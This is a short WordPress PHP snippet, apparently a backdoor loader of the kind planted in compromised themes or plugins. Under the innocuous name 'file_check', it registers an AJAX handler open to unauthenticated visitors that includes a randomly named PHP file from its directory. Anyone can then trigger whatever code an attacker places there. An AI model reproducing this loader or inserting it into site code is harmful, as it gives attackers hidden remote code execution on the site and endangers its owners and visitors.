if(!function_exists('file_check_tmpat2b3xs8')){ add_action('wp_ajax_nopriv_file_check_tmpat2b3xs8', 'file_check_tmpat2b3xs8'); add_action('wp_ajax_file_check_tmpat2b3xs8', 'file_check_tmpat2b3xs8'); function file_check_tmpat2b3xs8() { $file = __DIR__ . '/' . 'tmpat2b3xs8.php'; if (file_exists($file)) { include $file; } die(); } }